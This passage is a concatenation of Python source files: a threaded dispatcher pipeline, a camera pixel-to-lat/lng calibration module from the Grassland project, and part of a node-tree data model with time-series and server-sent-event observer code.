d = self.source.getData()
self.source.updateLock.release()
self.threadCount += 1
self.threadCountLock.release()
# Starting new thread
thread = self.getWorkerThread(d)
Thread(target=self.startThread, args=[thread]).start()
def getWorkerThread(self, data):
raise NotImplementedError
def connect(self, connecter):
try:
connecter.checkSource()
# It is a source so it goes in front of this dispatcher
self.source = connecter
connecter.succesor = self
        except AttributeError:
            # It has no checkSource(), so it comes behind this dispatcher with a queue
self.succesor = connecter
connecter.source = self
def startThread(self, thread):
t = Thread(target=thread.run)
t.start()
# Let's wait until the thread is finished
t.join()
self.threadCountLock.acquire()
self.threadCount -= 1
self.threadCountLock.release()
self.update()
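# Illustrative usage sketch (added, not part of the original module): a minimal
# one-stage pipeline that prints every queued item. All class and variable
# names below are made up for the example.
class _PrintWorker(WorkerThread):
    def run(self):
        print("processing", self.data)

class _PrintDispatcher(Dispatcher):
    def getWorkerThread(self, data):
        return _PrintWorker(self, data)

class _ListSource(Source):
    pass

if __name__ == "__main__":
    source = _ListSource()
    dispatcher = _PrintDispatcher()
    dispatcher.connect(source)      # source has checkSource(), so it goes in front
    source.finish()                 # builds the queue between source and dispatcher
    for item in ("a", "b", "c"):
        source.addData(item, firstTime=True)   # enqueue without triggering update yet
    source.start()                  # kicks off dispatcher.update(), spawning worker threads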
|
lnglat_homography.py
|
# Copyright (C) 2018-2019 David Thompson
#
# This file is part of Grassland
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of Grassland, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import numpy as np
import cv2
import os
import json
import requests
import plyvel
import multiprocessing
from multiprocessing import Queue, Pool
import gevent
from gevent.server import StreamServer
import time
from pathlib import Path
class MyException(Exception):
pass
class RealWorldCoordinates:
def __init__(self, tracking_frame):
# Create node's personal leveldb database if missing
self.node_db = plyvel.DB(str(Path.home())+'/.grassland/node_db/', create_if_missing=True)
self.CALIBRATING = False
self.tracking_frame = tracking_frame
self.calibration = {}
# pts_src and pts_dst are numpy arrays of points
# in source and destination images. We need at least
# 4 corresponding points.
pts_src = np.array([[421, 695], [1587, 198], [368, 309], [1091, 98]])
pts_dst = np.array([[581, 473], [618, 215], [296, 449], [281, 245]])
h, status = cv2.findHomography(pts_src, pts_dst)
def set_transform(self, calibrating=False):
self.CALIBRATING = calibrating
        # Get the real-world transform that yields the longitude and latitude coordinates of each pixel of the realigned image.
        # Using the node calibration web app, we can build a function that lets the node know the real-world (lat/lng) coordinates of each pixel in its frame.
        # The node calibration web app, using Mapbox and Open Street Map, can map pixel coordinates (2D space 'F') to latitude and longitude coordinates (2D space 'W').
        # By lining up the Open Street Map "camera" to exactly match the perspective of the real camera in the node, we can take a few pixel coordinates from 'F'
        # and their corresponding real-world coordinates 'W' from the web app and use them to find a function, a linear map (transformation matrix) 'L',
        # that takes any pixel coordinate from the space 'F' and produces the corresponding coordinate in 'W'. L(f) = w
#
# Code taken From https://stackoverflow.com/a/20555267/8941739
#primary = np.array([[0.0, 0.0], [1366.0, 0.0], [1366.0, 662.0], [0.0, 662.0]]) # Average dimensions of monitor viewing webapp. Maybe I should change this to be dynamic
height = float(self.tracking_frame['height'])
        height = height / 2  # The modification made to mapbox (https://github.com/mapbox/mapbox-gl-js/issues/3731#issuecomment-368641789) that allows a greater-than-60-degree pitch has a bug when unprojecting points close to the horizon: they get very "screwy". So the two top homography_point corners in the web app ('ul' and 'ur') actually start halfway down the canvas, so that they start from below the horizon.
width = float(self.tracking_frame['width'])
primary = np.array([[0.0, 0.0], [width, 0.0], [width, height], [0.0, height]])
# if not dynamic: #
# secondary = np.array([[-75.75021684378025, 45.393495598366655], [-75.7512298958311, 45.39309963711102], [-75.75150315621723, 45.393444401619234], [-75.75049010416637, 45.393840360459365]])
secondary_array = []
'''
Sample Node Format
{
'id': 'n68b5a19ef9364a74ae73b069934b21a4',
'tracking_frame': {'height': 281, 'width': 500},
'calibration': {
'lng_focus': -75.75107566872947,
'bearing': 62.60000000000002,
'lat_focus': 45.39331613895314,
'pitch': 55.00000000000001,
'homography_points': {
'corners': {
'ul': {
'lat': 45.395059987864016,
'lng': -75.75055046479982
},
'll': {
'lat': 45.392791493630654,
'lng': -75.75123398120483
},
'ur': {
'lat': 45.392869098373296,
'lng': -75.74893325620522
},
'lr': {
'lat': 45.39362547029299,
'lng': -75.75184957418519
}
},
'markers': {}
}
}
}
'''
# MySQL
if self.CALIBRATING:
# Get calibration values from Calibration Map
# https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.get_event_loop
# asyncio.get_event_loop().run_until_complete(self.call_websocket())
#self.msl = multiprocessing.Process(target=self.mapserver_loop)
#self.msl.daemon = True
#self.msl.start()
#print("Finished starting msl")
self.calibration_socket_server = StreamServer(('127.0.0.1', 8765), self.calibration_socket_server_handler)
self.calibration_socket_server.start()
self.node_get()
corner_names = ['ul', 'ur', 'll', 'lr']
for corner_name in corner_names:
ul_lng = self.calibration['homography_points']['corners'][corner_name]['lng']
ul_lat = self.calibration['homography_points']['corners'][corner_name]['lat']
secondary_array.append([ul_lng, ul_lat])
secondary = np.array(secondary_array)
# Pad the data with ones, so that our transformation can do translations too
n = primary.shape[0]
pad = lambda x: np.hstack([x, np.ones((x.shape[0], 1))])
unpad = lambda x: x[:,:-1]
X = pad(primary)
Y = pad(secondary)
# Solve the least squares problem X * A = Y
# to find our transformation matrix A
A, res, rank, s = np.linalg.lstsq(X, Y)
# Real World Transform
self.rw_transform = lambda x: unpad(np.dot(pad(x), A))
np.set_printoptions(suppress=True)
print("Target:")
print(secondary)
print("Result:")
print(self.rw_transform(primary))
print("Max error:", np.abs(secondary - self.rw_transform(primary)).max())
A[np.abs(A) < 1e-10] = 0 # set really small values to zero
print(A)
print("Now Try it")
print(self.rw_transform(np.array([[300, 200]])))
print(self.rw_transform(np.array([[300.0, 200.0]])))
def node_update(self):
self.node_get()
#node_id = os.environ['NODE_ID']
#gl_api_endpoint = os.environ['GRASSLAND_API_ENDPOINT']
# data = { "id": node_id, "tracking_frame": self.tracking_frame, "calibration": self.calibration }
#response = requests.put(gl_api_endpoint+"node_update", json=data)
tracking_frame_string = json.dumps(self.tracking_frame)
self.node_db.put(b'tracking_frame', bytes(tracking_frame_string, 'utf-8'))
calibration_string = json.dumps(self.calibration)
self.node_db.put(b'calibration', bytes(calibration_string, 'utf-8'))
def node_get(self):
if self.CALIBRATING:
self.call_gevent_wait()
#node_id = os.environ['NODE_ID']
# gl_api_endpoint = os.environ['GRASSLAND_API_ENDPOINT']
# response = requests.get(gl_api_endpoint+"node_get"+"?id="+str(node_id))
# tracking_frame = self.node_db.get(b'tracking_frame')
# if tracking_frame == None: # THROW ERROR
# raise MyException("!!! leveldb get 'tracking_frame' returned None !!!!")
# else:
# print(tracking_frame)
# self.tracking_frame = json.loads(tracking_frame.decode("utf-8"))
if self.CALIBRATING:
calibration = self.node_db.get(b'calibration')
if calibration == None:
self.call_gevent_wait()
timeout = time.time() + 60*5 # 5 minutes from now
print("WAITING FOR YOU TO USE THE MAPSERVER TO SET THE CALIBRATION VALUES IN THE DATABASE ...")
while True:
if time.time() > timeout:
print("TIMED OUT WAITING FOR THE CALIBRATION TO BE SENT FROM THE MAP SERVER!!")
break
calibration = self.node_db.get(b'calibration')
if calibration == None:
self.call_gevent_wait()
else:
self.calibration = json.loads(calibration.decode("utf-8"))
break
else:
print(calibration.decode("utf-8"))
self.calibration = json.loads(calibration.decode("utf-8"))
else:
calibration = self.node_db.get(b'calibration')
if calibration == None: # THROW ERROR
raise MyException("!!! leveldb get 'calibration' returned None. Restart with '--mode CALIBRATING' !!!!")
else:
print(calibration)
self.calibration = json.loads(calibration.decode("utf-8"))
def coord(self, x, y):
coord = self.rw_transform(np.array([[x, y]]))
return {
"lng": coord[0][0],
"lat": coord[0][1]
}
def calibration_socket_server_handler(self, socket, address):
calibration_bytes_object = socket.recv(4096)
# print("calibration_bytes_object")
# print(calibration_bytes_object)
# Store calibration in leveldb
#self.node_db.put(b'calibration', bytes(calibration_string, 'utf-8'))
self.node_db.put(b'calibration', calibration_bytes_object)
# Get it back
calibration = self.node_db.get(b'calibration')
self.calibration = json.loads(calibration.decode("utf-8"))
# Get camera frame dimensions (frame_dim). Could pull from database but this is easier
tracking_frame_string = json.dumps(self.tracking_frame)
# Send camera frame dimensions (frame_dim)
socket.sendall(bytes(tracking_frame_string, 'utf-8'))
def call_gevent_wait(self):
gevent.wait(timeout=1) # https://stackoverflow.com/a/10292950/8941739
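# Illustrative standalone sketch (added, not part of the original module): the
# padded least-squares fit used inside set_transform() above, reduced to a
# small function. The pixel corners and lat/lng values below are made up.
def fit_affine_transform(primary, secondary):
    # pad with ones so the linear map can also translate, then solve X * A = Y
    pad = lambda x: np.hstack([x, np.ones((x.shape[0], 1))])
    unpad = lambda x: x[:, :-1]
    A, _, _, _ = np.linalg.lstsq(pad(primary), pad(secondary), rcond=None)
    return lambda x: unpad(np.dot(pad(x), A))

if __name__ == "__main__":
    pixels = np.array([[0.0, 0.0], [500.0, 0.0], [500.0, 140.5], [0.0, 140.5]])
    lnglat = np.array([[-75.7506, 45.3951], [-75.7489, 45.3939],
                       [-75.7512, 45.3928], [-75.7518, 45.3936]])
    to_world = fit_affine_transform(pixels, lnglat)
    print(to_world(np.array([[250.0, 70.0]])))   # roughly the centre of the frame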
|
model.py
|
import glob
import json
import copy
import importlib
import threading
import logging
from logging.handlers import RotatingFileHandler
import pytz
#for tables
import numpy
import numpy as np
import datetime
import dateutil.parser
import sys
import os
import time
import uuid
import hashlib
import random
import traceback
from dates import *
# type hints
from typing import List
import modeltemplates
# for Observer
from queue import Queue
from queue import Empty
import utils
from timeseries import TimeSeriesTable
from dates import *
import inspect
from utils import str_lim
"""
next Todo
-
- execute: problem in the thread with the execution
- code documentation
- google document
-
"""
sys.path.append("./plugins") #for the importlib loader, doesn't understand relative paths
#sys.path.append("./private") #for the importlib loader, doesn't understand relative paths
myGlobalDir = os.path.dirname(os.path.realpath(__file__)) # holds the directory of this script
def getRandomId():
return '%08x' % random.randrange(16 ** 8)
#used as an OOP wrapper for the flat and procedural style of the model class
class Node():
""" used as an OOP wrapper for the flat and procedural style of the model class
it is a convenient way to access nodes and their hierarchy and internals
"""
def __init__(self,myModel,myId):
""" a node can be created by calling the
mynode = model.get_node("root.mynode") or
mynode = Node(mymodel,"123")
Returns:
a node object for further access to values, hierarchy etc.
"""
self.model = myModel # this is not a copy!!
self.id = myId
def __repr__(self):
return 'Node(id={:}, value={:})'.format(self.id, self.get_value())
def get_value(self):
""" Returns:
the "value" property of the node
None if node has no "value"
"""
return self.model.get_value(self.id)
#####################
# time series node API
def get_time_series(self, start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None):
"""
        Returns:
            dict with {"__time": [...], "values": [...]}
"""
browsePath = self.model.get_browse_path(self.id)
data = self.model.time_series_get_table(variables = [browsePath],
tableDescriptor=None,
start=start,
end=end,
noBins=noBins,
includeIntervalLimits=includeIntervalLimits,
resampleTimes=resampleTimes,
format=format,
toList=toList,
resampleMethod=resampleMethod)
if data !={} :
return data[browsePath]
else:
return None
def get_raw_time_series(self,start=None,end=None):
return self.model.time_series_get_raw(self.id,start=start,end=end)
def add_references(self,targetNodes,deleteAll=False,allowDuplicates=True):
"""
add references from the node to the targets
Args:
targetNodes: node or list of nodes to reference to
            deleteAll: if set to true, we delete all existing references before creating the new ones
Returns
True/False for success/error
"""
if deleteAll:
self.model.remove_forward_refs(self.id)#this deletes all existing
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.add_forward_refs(self.id,targetIds,allowDuplicates=allowDuplicates)
def del_references(self,targetNodes=[]):
"""
remove the forward refs from this node to targetNodes
:return:
"""
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.remove_forward_refs(self.id,targetIds)
def set_value(self,value):
"""
special support for "column" types: if a scalar is given, we make a "full" array
"""
if self.get_properties()["type"] == "column":
if type(value) != numpy.ndarray and type(value) != list:
#we have a scalar, so we set it
#get the len of the table
timeNode = self.get_table_time_node()
length = len(timeNode.get_value())
value = numpy.full(length,value,dtype=numpy.float64)
return self.model.set_value(self.id,value)
def set_time_series(self,values=None,times=None):
"""
replaces the time series with value and times, it deletes the existing
"""
return self.model.time_series_set(self.id,values=values,times=times)
def insert_time_series(self,values=None,times=None,allowDuplicates = False):
"""
insert data, if the time stamp exists already, we replace it
"""
return self.model.time_series_insert(self.id,values=values, times=times, allowDuplicates=allowDuplicates)
def merge_time_series(self,values=None, times=None):
""" merge the times series of mergeNode into this node"""
return self.model.time_series_merge(self.id,values = values,times=times)
def delete_time_series(self,start=None,end=None):
return self.model.time_series_delete_area(self.id, start=start, end=end)
#####################
# event series node API
def get_event_series(self, start=None, end=None, format="default",eventFilter = None):
return self.model.event_series_get(self.id,start=start,end=end,format=format,eventFilter=eventFilter)
def set_event_series(self, values=None, times=None):
"""
replaces the event series with value and times, it deletes the existing
"""
return self.model.event_series_set(self.id,values=values,times=times)
def insert_event_series(self,values=None,times=None,allowEventDuplicates = False):
return self.model.event_series_insert(self.id,values,times,allowEventDuplicates=allowEventDuplicates)
def delete_event_series(self,start=None, end = None, eventsToDelete=[]):
return self.model.event_series_delete(desc=self.id,start=start,end=end,eventsToDelete=eventsToDelete)
def get_parent(self):
""" Returns:
a Node()-instance of the parent of the current node,
None if no parent available
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
return self.model.get_node(nodeInfo["parent"])
else:
return None
def get_child(self,childName):
"""
Args:
childName(nodedescription):
Returns:
a Node() instance of the child holding the childName
None if the current node does not have a child with the name childName
"""
if '.' in childName:
remain = '.'.join(childName.split('.')[1:])
now = childName.split('.')[0]
child = self.get_child(now)
if child:
return child.get_child(remain)
else:
return None
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.model.get_node_info(childId)
if childInfo["name"] == childName:
return self.model.get_node(childId)
return None
def delete(self):
"""
        delete this node from the model; note that the object itself is not destroyed, but it is disconnected from the model
so should not be used anymore afterwards
:return:
"""
return self.model.delete_node(self.id)
def create_child(self,name=None,type="folder",value=None,properties={}):
"""
create a node under the current node, if the node exists already, we get the node
Args:
name [string] the child name
type [string] the type of the node
value [any] direct assignment of values
            properties [dict] a dict with further settings of properties like value, type etc.
Returns:
the node objects or none if not available
"""
if name == None:
name = '%08x' % random.randrange(16 ** 8)
id = self.model.create_node(parent=self.id,name=name,type=type,value=value,properties=properties)
if id:
return self.model.get_node(id)
else:
#we try to get it anyways
return self.get_child(name)
def get_children(self, deepLevel=1):
""" Returns:
a list of Node()-objects which are the children of the current node
args:
deepLevel: set >1 to get children and childrens' children
"""
nodeInfo = self.model.get_node_info(self.id)
children = []
if nodeInfo["children"]:
children=[self.model.get_node(id) for id in nodeInfo['children'] ]
while deepLevel>1:
deepLevel -=1
childrenOld = children.copy()
for child in childrenOld:
children.extend(child.get_children())
            #remove duplicates via id:
childDict = {child.get_id():child for child in children} # same keys(id) will only be there once
children = list(childDict.values())
return children
def get_properties(self):
""" Returns:
a dictionary holding the properties of the node like {"value":123,"name":"myVariable","children":...}
"""
nodeInfo = self.model.get_node_info(self.id)
return copy.deepcopy(nodeInfo)
def get_type(self):
"""
        Returns:
the type of the node
"""
return self.get_property("type")
def get_property(self,property):
"""
Args:
property: the property name asked for
Returns:
the value of the property behind the property given
None if the property does not exist
"""
nodeDict =self.get_properties()
if property in nodeDict:
return self.get_properties()[property]
else:
return None
def set_properties(self,properties):
"""
add or modify properties of a node
Args:
properties [dict] holding key,value for the properties
Returns
True for ok, False for not done
"""
return self.model.set_properties(properties,nodeDesc=self.id)
def get_model(self):
""" this function should only be used for testing, we should never be in the need to access the model inside
Returns:
the underlying model of type Model() class
"""
return self.model
def get_target_ids(self):
""" this function returns the target ids of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
return self.get_properties()["forwardRefs"]
def get_target(self):
""" this function returns the first direct taret node of a referencer not resolving the leaves"""
if self.get_properties()["type"] == "referencer":
targets = self.get_properties()["forwardRefs"]
if targets:
return Node(self.model,targets[0])
return None
def get_targets(self):
""" this function returns the target Nodes of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
targets = []
for nodeid in self.get_properties()["forwardRefs"]:
targets.append(Node(self.model,nodeid))
return targets
def get_leaves(self):
""" this function returns a list of Nodes containing the leaves where this referencer points to
            this function works only for nodes of type "referencer", as we are following the forward references
            leaves are defined as follows:
            1) all nodes that are listed under the forward references and which are not of type referencer or folder
            2) if nodes pointed to are referencers, the targets are analyzed again
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all nodes which are considered leaves as a list of Node() objects
"""
leaves = self.model.get_leaves(self.id) # a list of node dicts
leaveNodes = []
for leave in leaves:
leaveNodes.append(Node(self.model,leave["id"]))
return leaveNodes
def get_leaves_ids(self):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
return self.model.get_leaves_ids(self.id)
def get_id(self):
""" Returns: the nodeid (which is generated by the system) """
return self.id
def get_browse_path(self):
""" Returns: the browsepath along the style "root.myfolder.myvariable..." """
return self.model.get_browse_path(self.id)
def get_name(self):
""" Returns: the name of the node without the path """
return self.model.get_node_info(self.id)["name"]
def get_node(self,desc):
return self.model.get_node(desc)
def get_table_time_node(self):
""" if the current node belongs to a table, then we can get the time node
a node
Returns:
(obj Node()) the node of type
"""
timeNode = self.model.find_table_time_node(self.id)
if timeNode:
return Node(self.model,timeNode)
else:
return None
def get_table_len(self):
"""
if the current node is a type "table", we get the current len
Return:
the len of the columns of the table
"""
return self.model.get_table_len(self.id)
def get_table_node(self):
"""
if the current node is a column of a time series table, we get the according table node of type "table"
Return:
a Node() of type "table" which is the table of the current node
"""
tableId = self.model.find_table_node(self.id)
if tableId:
return self.model.get_node(tableId)
else:
return None
def get_time_indices(self,startTime,endTime):
""" works only for the time node, it looks to find the timeField node of the table to which the node belongs
then tries to find start and end time inside the timeField column and returns the index (rownumber) which are
INSIDE the given startTime, endTime
Args:
startTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
endTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
Returns:
(numpy array) indexnumbers containing the rows of the table that fall inside the given [startTime, endTime] intervall
None for not finding table, timeField, start-endTimes whatsoever
"""
try:
startTime = date2secs(startTime)
endTime = date2secs(endTime)
times = numpy.asarray(self.get_value())
indices = numpy.where((times >= startTime) & (times <= endTime))[0]
return indices
except:
return None
def execute(self):
return self.model.execute_function(self.id)
def execute_synchronous(self):
return self.model.execute_synchronous(self.id)
def instantiate(self):
return self.model.instantiate_object(self.id)
def get_object(self):
return self.model.get_object(self.id)
def get_logger(self):
return self.model.logger
def connect_to_table(self,tableNode):
"""
connect a node to a table, it must be a column type
the node itself will be reset and filled with numpy.inf and prepared to work with the table:
an array will be created with np.inf of the current table size
and the column will be hooked to the table referencer
Returns:
True on success
"""
if self.get_property("type") != "column":
return False
#now make an array of np.inf of the current table size and apply the value
timeNode = tableNode.get_table_time_node()
if not timeNode:
return False
tableLen = len(timeNode.get_value())
self.set_value(numpy.full(tableLen,numpy.inf,dtype=numpy.float64))
#now hook it as column to the table
#check if we are part of it already
for column in tableNode.get_child("columns").get_leaves():
if column.get_id() == self.get_id():
return True
#now connect it to the table
return self.model.add_forward_refs(tableNode.get_child("columns").get_id(), [self.id],allowDuplicates=False)
def get_columns(self):
"""
        get the column nodes of a table, excluding the time node
can be executed on the table node
Returns:
list of node objects which are the columns of the table without the time node
"""
if self.get_properties()["type"] != "table":
return None
nodes = self.get_child("columns").get_leaves()
timeNode = self.get_table_time_node()
return [node for node in self.get_child("columns").get_leaves() if node.get_id() != timeNode.get_id()]
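# Illustrative sketch (added, not part of the original module): typical use of
# the Node() wrapper on top of a Model instance (the Model class is defined
# further below in this file). Assumes a ./log directory exists for the model's
# log file; the folder/child names are placeholders.
def _node_api_demo():
    model = Model(loadPlugins=False)                  # skip plug-in loading for the sketch
    folder = model.get_node("root").create_child("myfolder")   # default type is "folder"
    child = folder.create_child("mychild")
    print(child.get_browse_path())                    # -> "root.myfolder.mychild"
    print(model.get_node("root.myfolder").get_child("mychild").get_name())   # -> "mychild"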
class Observer:
# The observer needs a reference to the model, because the rest service is not able to detect
# when the client connection is closed, but the observer message handling loop can detect it
# this way the observer can detach itself from the model, when the client is disconnected
    # there are two queues involved: the updateQueue holding events pushed from the model
    # and the eventQueues, which are the filtered updateQueue (filtering avoids sending multiple identical events in a short time)
def __init__(self, model):
self.model = model
# Message queues to store the new events and last time stamps
self.updateQueue = Queue()
        self.eventQueues = {} # k,v = eventIdentification: {"lastTimeStamp": datetime, "queue": Queue()}
self.minWaitTime = 0.500 #in seconds float
        # use the logger of the model
self.logger = self.model.logger
self.lock = threading.RLock()
        #preload queue: this is a workaround as the browser does not get the first 2 events immediately
# it actually doesn't help ..?
for i in range(2):
self.updateQueue.put({"event":"_preload","id":"","data":{"xy":str(i)}})
def update(self, event):
"""
        inform the observer about the occurrence of an event
        Args:
            event (dict): the event to enqueue; may contain "event", "id" and "data" keys,
                missing keys are filled with defaults
"""
defaultEvent = {"data":"","id":"","event":""}
defaultEvent.update(event)
self.updateQueue.put(defaultEvent)
#self.logger.debug(f"Qup {id(self)} {defaultEvent['event']}, {defaultEvent['id']}")
def get_event(self):
"""
        get the next event from the observer class; this is used as a generator for the webserver
        we also filter out events to avoid a train of identical events:
        the filtering uses self.minWaitTime, within that period we don't send identical events;
        events are "identical" if they have the same "event" and "data"
"""
self.logger.debug(f"Observer {id(self)} get_event()")
stop_event_processing = False # This flag shows when to stop the event processing
while not stop_event_processing:
try:
# Try to retrieve an item from the update queue
event = self.updateQueue.get(block=True,timeout=self.minWaitTime)
#self.logger.debug(f"event pick {event}")
#create an eventIdentification, this is used to filter out repeated events
                # we build the eventIdentification so that events carrying unique information are kept
# we take all information from the event.data field, so only the events WITHOUT unique data will be removed
# those are typically the tree.update events
eventIdentification = event["event"] #the event name itself
for key in event["data"]:
eventIdentification = eventIdentification+str(key)+str(event["data"][key])
#now sort this event into the queues of eventids
if eventIdentification not in self.eventQueues:
# this is a new type/identificatin of event, create an entry in the event queue
# put the event in the queue and make the last timestamp so that we send it out now
self.eventQueues[eventIdentification]={"lastTimeStamp":0,"queue":Queue()}
self.eventQueues[eventIdentification]["queue"].put(event)
except Exception as ex:
# this happens if we time out the queue get, no problem, just continue
#self.logger.error(f"Exception observer {id(self)} thread self.updateQueue.get: {ex},{str(sys.exc_info()[0])}")
pass
#now go over all the sorted event queues and check what to send out:
if 0:
#show the queues
for k,v in self.eventQueues.items():
q = v["queue"]
qLen = q.qsize()
self.logger.debug(f"Queue {k}: len {qLen} {[q.queue[id] for id in range(qLen)]}")
try:
now = time.time()
                for eventIdentification,entry in self.eventQueues.items(): # entry is {"lastTimeStamp": ..., "queue": ...}
#self.logger.debug(f"observer {id(self)} check queue of {eventIdentification} size: {entry['queue'].qsize()},last:{entry['lastTimeStamp']}, now:{now}, ready: {now > (entry['lastTimeStamp']+self.minWaitTime)}")
if (not entry["queue"].empty()) and ((now > (entry["lastTimeStamp"]+self.minWaitTime) or "system.progress" in eventIdentification)):
                        # for system.progress events there is no timeout, we always send the update directly
# send this event, the timeout was met, we pull the first event from the queue, trash the remaining ones
"""
old code
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
myEvent = self.eventQueues[eventIdentification]["queue"].get()
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {myEvent["data"]}\n\n'
self.logger.debug(f'Observer {id(self)} sending event: {event_string}')
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
self.eventQueues[eventIdentification]["queue"].get(False)
self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
"""
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
#self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
myEvent = self.eventQueues[eventIdentification]["queue"].get(False)
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {json.dumps(myEvent["data"])}\n\n'
#self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
# This exception is raised when the generator function is exited, which means that the
# client side connection to the SSE stream was close, thus the observer could be removed
except GeneratorExit:
self.logger.warning(f"Observer {id(self)} connection closed.")
stop_event_processing = True
self.logger.warning(f"Observer {id(self)} exiting event processing.")
# Detach this observer from the model
self.model.detach_observer(self)
class Model:
nodeTemplate = {"id": None, "name": None, "type": "folder", "parent": None, "children": [], "backRefs": [],"forwardRefs":[],"value":None}
def __init__(self,loadPlugins=True):
"""
        initialize an empty Model object, it will contain the root node as a folder with id "1"
        during the initialization the plug-ins (all files in the ./plugins folder) are also loaded:
all templates and functions are imported
a model holds all modelling information and data to work on
"""
self.version = 0.1
self.model = {"1":{
"name":"root",
"type":"folder",
"children":[],
"parent":"0",
"id":"1",
"backRefs":[],
"forwardRefs":[],
"version":self.version
}}
        self.disableObserverCounter = 0 # a counting semaphore (under manual lock) for disabling: if zero, notify_observers is active, otherwise it is not
self.__init_logger(logging.DEBUG)
self.globalIdCounter=1 # increased on every creation of a node, it holds the last inserted node id
self.idCreationHash = True # if this is true, we create the id per hash, not per counter
self.ts = TimeSeriesTable()
self.functions={} # a dictionary holding all functions from ./plugins
self.templates={} # holding all templates from ./plugins
self.lock = threading.RLock()
        self.executeFunctionRunning = False # when set to true, it makes sure only one function runs at a time
        self.objectClasses = {} # a dictionary holding all object classes from ./plugins
if loadPlugins:
self.import_default_plugins()
self.differentialHandles ={} # containing model_copy entries to support differential queries
self.diffHandleCounter = 0 # used only for debugging
self.differentialHandlesMaxPerUser = 10
self.currentModelName = "emptyModel" # the current name of the model
self.modelUpdateCounter = 0 #this is for the tree observer, on any change, we update the counter
self.observerStatus = {} # a dict holding the key = observerid and value : the needed status of an observer processing
self.executionQueue = Queue()
self.observers = []
self.sse_event_id = 1
self.start_function_execution_thread()
def __del__(self):
self.functionExecutionRunning = False # stop the execution thread of functions
def __init_logger(self, level):
"""setup the logger object"""
self.logger = logging.getLogger("Model-"+'%08x' % random.randrange(16 ** 8))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
logfile = RotatingFileHandler("./log/model.log", maxBytes=1000 * 1000 * 100, backupCount=10) # 10x100MB = 1GB max
logfile.setFormatter(formatter)
self.logger.addHandler(logfile)
self.logger.setLevel(level)
def __get_id(self, id):
"""
Args:
id (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
or a "fancy" path mixed like "1000.min" where 1000 is a node id, only the first is allowed as Nodeid, the followings are names
Returns:
(string): the node id as string
None if not found
"""
if id in self.model:
return id
#maybe a browsepath?
try:
names = id.split('.')
if names[0]=="root":
names = names[1:]
actualSearchId = "1"
elif names[0] in self.model:
#self.logger.debug(f"fancy browsepath {names}")
actualSearchId = names[0]
names = names[1:]
else:
return None
except:
return None
#now we start at root
for name in names:
nextSearchId = None
for childId in self.model[actualSearchId]["children"]:
if self.model[childId]["name"] == name:
#this is a match
nextSearchId = childId
break
if not nextSearchId:
return None
#we found it, go deeper now
actualSearchId = nextSearchId
return actualSearchId
def get_node(self,desc):
""" instantiate a Node() object on the node given as desc
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if id:
return Node(self,id)
    def find_node(self,search,matchProperty={}):
        """
        the search is a match pattern for the path, we return the first match;
        matchProperty optionally restricts the match to nodes whose properties
        equal the given key/value pairs
        """
        with self.lock:
            for id in self.model:
                if search in self.get_browse_path(id):
                    if matchProperty != {}:
                        if not all(k in self.model[id] and self.model[id][k] == v
                                   for k, v in matchProperty.items()):
                            continue
                    return Node(self, id)
            return None
    def find_nodes(self,search,matchProperty={}):
        """
        the search is a match pattern for the path, we return all matches as nodes;
        matchProperty optionally restricts the matches as in find_node()
        """
        found = []
        with self.lock:
            for id in self.model:
                if search in self.get_browse_path(id):
                    if matchProperty != {}:
                        if not all(k in self.model[id] and self.model[id][k] == v
                                   for k, v in matchProperty.items()):
                            continue
                    found.append(Node(self, id))
            return found
def get_type(self,desc):
with self.lock:
id = self.__get_id(desc)
if not id: return None
return self.model[id]["type"]
def get_node_info(self,desc,includeLongValues=True):
"""
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
includeLongValue if true, we include values for columns and files
Returns:
(dict): a dictionary holding all properties of the node includin references and children
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
#we do not include values of columns and files
if self.model[id]["type"] in ["column","file","timeseries"]:
if includeLongValues:
return copy.deepcopy(self.model[id])
else:
return {k:v for k,v in self.model[id].items() if k!="value"}
elif self.model[id]["type"]== "object":
return {k: v for k, v in self.model[id].items() if k != "object"} # don't take the "object" key
else:
#take all
return copy.deepcopy(self.model[id])
def __get_node_with_children(self,id,nodes,includeForwardRefs=True):
